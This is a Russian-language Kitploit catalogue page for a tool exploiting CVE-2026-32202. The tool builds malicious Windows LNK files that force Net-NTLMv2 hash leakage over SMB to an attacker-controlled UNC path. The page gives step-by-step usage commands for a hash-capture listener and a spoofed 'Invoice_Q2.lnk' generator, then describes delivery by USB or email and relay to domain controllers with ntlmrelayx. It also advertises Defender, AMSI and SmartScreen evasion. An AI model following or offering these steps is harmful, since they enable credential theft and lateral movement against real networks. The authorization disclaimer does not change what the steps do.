Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2026-32202 — Генерирует вредоносные LNK-файлы для принудительного получения хэшей Net-NTLMv2 через обработку UNC в Windows Shell, с пользовательским SMB-прослушивателем и интеграцией ретрансляции для авторизованных операций red team. | Kitploit
Инструменты/GitHubGitHub/solarlynxsqueeze/cve-2026-32202
Генерация полезной нагрузкиЭксплуатацияЛатеральное перемещениеТестирование на ПроникновениеRed Teaming
GitHubsolarlynxsqueeze/cve-2026-32202

CVE-2026-32202

Генерирует вредоносные LNK-файлы для принудительного получения хэшей Net-NTLMv2 через обработку UNC в Windows Shell, с пользовательским SMB-прослушивателем и интеграцией ретрансляции для авторизованных операций red team.

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Репозиторий
3 месяцев назадЕщё не проверено
Поделиться

Дисклеймер

Этот инструмент предназначен только для авторизованного red teaming и тестирования на проникновение.
Несанкционированное использование против систем без явного разрешения незаконно.
Используйте на свой страх и риск. Автор не несёт ответственности за любое неправомерное использование или ущерб.

Описание
Принудительное получение NTLMv2-хэша через обход неполной защиты Windows Shell (CVE-2026-32202). Генерирует специально созданные LNK-файлы, которые принуждают к SMB/UNC-аутентификации при открытии или предпросмотре в Проводнике. Низкая интерактивность, работает на пропатченных системах, где исправление от апреля 2026 года оказалось недостаточным. Активно используется в реальных проектах.

Ключевые возможности

  • Утечка Net-NTLMv2 без кликов / с минимальным взаимодействием через вредоносный LNK (предпросмотр в Проводнике + путь разрешения иконки).
  • Собственный SMB-слушатель для перехвата хэшей (Responder не нужен, логи чище).
  • Стабильный вариант со сниженным следом для ETW/Defender.
  • Частичный режим обхода AMSI/SmartScreen.
  • Готов к цепочкам ретрансляции ntlmrelayx (SMB, LDAP, HTTP и т.д.).

Что делает эксплойт
Инструмент создаёт специально сформированный .LNK, который злоупотребляет обработкой Shell UNC-путей в Target + структурах IconEnvironmentDataBlock / ExtraData. Когда жертва просматривает папку или наводит курсор/предпросматривает файл, Windows Shell инициирует SMB-подключение к контролируемому злоумышленником UNC-пути, утекая Net-NTLMv2-хэш машины/пользователя. Без выполнения кода на цели — принудительное получение учётных данных для ретрансляции или взлома.

Почему это полезно

  • Быстрый начальный доступ во внутренних пентестах / red team-операциях (особенно в изолированных или усиленно защищённых средах, где фишинг ограничен).
  • Идеально для NTLM-ретрансляции на высокоценные цели (контроллеры домена, файловые серверы, Exchange, ADCS и т.д.).
  • Работает там, где классический Responder заблокирован или слишком шумен.
  • Высокий процент успеха на Win10 21H2–22H2, Win11 23H2–26H1, Server 2019–2025 (протестированные сборки ниже).

Протестировано на

  • Windows 11 24H2 (сборка 26100.XXXX)
  • Windows 11 23H2 / 25H2
  • Windows 10 22H2
  • Windows Server 2022 / 2025 (core + desktop experience)
  • Частично эффективно после кумулятивного обновления апреля 2026 года (неполное исправление подтверждено в реальных условиях).

Зависимости Установка: pip install -r requirements.txt

Использование

root@kitploit:~
# 1. Запуск сервера перехвата (хост атакующего)
python smbcapture.py -i 0.0.0.0 -p 445 --output hashes.txt

# 2. Генерация вредоносного LNK
python coercegen.py --unc \\attacker-ip\share\test --output "Invoice_Q2.lnk" --spoof "invoice.pdf"

# Опционально: стабильный режим или режим обхода
python coercestable.py --unc \\attacker-ip\share\test --output "Report.lnk"

# 3. Доставка LNK (USB, общий ресурс, вложение в письме, OneDrive и т.д.)

# 4. Ожидание хэша в терминале + файле. Пример ретрансляции:
ntlmrelayx.py -t smb://target-dc -c whoami --no-wmipriv
# или LDAP-ретрансляция для RBCD, HTTP для сертификатов ADCS и т.д.

Эксплойт

href

Ограничения

  • Требуется взаимодействие жертвы с содержащей папкой (предпросмотр/наведение курсора в Проводнике обычно достаточно).
  • Современная сегментация сети + подпись SMB + ограничения NTLM снижают успех ретрансляции.
  • Это не полный RCE — только материал учётных данных.
  • Статус патчей имеет значение; полностью обновлённые системы с апреля 2026+ могут потребовать вариант с обходом.

Корневая причина (кратко)
Неполное исправление в санитизации UNC-путей Windows Shell и обработке блоков ExtraData для разрешения иконок/целей LNK. Механизм защиты, предназначенный для блокировки несанкционированного сетевого спуфинга, всё ещё запускает NTLM-аутентификацию во время перечисления пространства имён Shell.

Скачать инструмент